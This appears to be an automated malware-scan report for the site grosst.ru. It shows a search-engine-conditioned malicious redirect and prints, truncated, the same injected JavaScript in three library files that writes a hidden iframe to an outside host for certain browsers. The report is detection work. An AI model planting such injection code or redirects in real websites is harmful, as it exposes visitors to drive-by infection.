Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=grosst.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://grosst.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: grosst.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Mon, 29 Sep 2014 01:20:27 GMT Location: http://tuttomariorestaurant.com/cache/mod_login/tutto/a.php Server: Apache Content-Length: 0 Content-Type: text/html; charset=windows-1251 Expires: Mon, 29 Sep 2014 01:20:27 GMT | malicious |
Scanned pages/files
Request | Server response | Status |
http://grosst.ru/ | 200 OK Content-Length: 24224 Content-Type: text/html | clean |
http://grosst.ru/media/system/js/caption.js | 200 OK Content-Length: 2690 Content-Type: application/x-javascript | clean |
http://grosst.ru/templates/final3/js/prototype.js | 200 OK Content-Length: 126855 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://quwalda.kashyap1.com/jsrtj add: function(classNameToAdd) { if (this.include(classNameToAdd)) return; this.set($A(this).concat(classNameToAdd).join(' ')); }, remove: function(classNameToRemove) { if (!this.include(classNameToRemove)) return; this.set($A(this).without(classNameToRemove).join(' ')); }, toString: function() { return $A(this).join(' '); } }; Object.extend(Element.ClassNames.prototype, Enumerable); Element.addMethods(); Antivirus reports:
| ||
http://grosst.ru/templates/final3/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 3377 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://quwalda.kashyap1.com/jsrtj return (s.src && s.src.match(/scriptaculous\.js(\?.*)?$/)) }).each( function(s) { var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,''); var includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider,sound').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load(); Antivirus reports:
| ||
http://grosst.ru/templates/final3/js/lightbox.js | 200 OK Content-Length: 19204 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://quwalda.kashyap1.com/jsrtj windowHeight = document.body.clientHeight; } if(yScroll < windowHeight){ pageHeight = windowHeight; } else { pageHeight = yScroll; } if(xScroll < windowWidth){ pageWidth = xScroll; } else { pageWidth = windowWidth; } return [pageWidth,pageHeight]; } } document.observe('dom:loaded', function () { new Lightbox(); }); Antivirus reports:
| ||
http://grosst.ru/material | 200 OK Content-Length: 19693 Content-Type: text/html | clean |
http://grosst.ru/material/mex | 200 OK Content-Length: 19704 Content-Type: text/html | clean |
http://grosst.ru/material/kirza | 200 OK Content-Length: 19756 Content-Type: text/html | clean |
http://grosst.ru/material/natko | 200 OK Content-Length: 18943 Content-Type: text/html | clean |
http://grosst.ru/price | 200 OK Content-Length: 14042 Content-Type: text/html | clean |
http://grosst.ru/price/pricemex | 200 OK Content-Length: 14058 Content-Type: text/html | clean |
http://grosst.ru/price/pricekirza | 200 OK Content-Length: 13861 Content-Type: text/html | clean |
http://grosst.ru/price/natkots | 200 OK Content-Length: 14149 Content-Type: text/html | clean |
http://grosst.ru/online | 200 OK Content-Length: 14213 Content-Type: text/html | clean |
http://grosst.ru/news | 200 OK Content-Length: 14654 Content-Type: text/html | clean |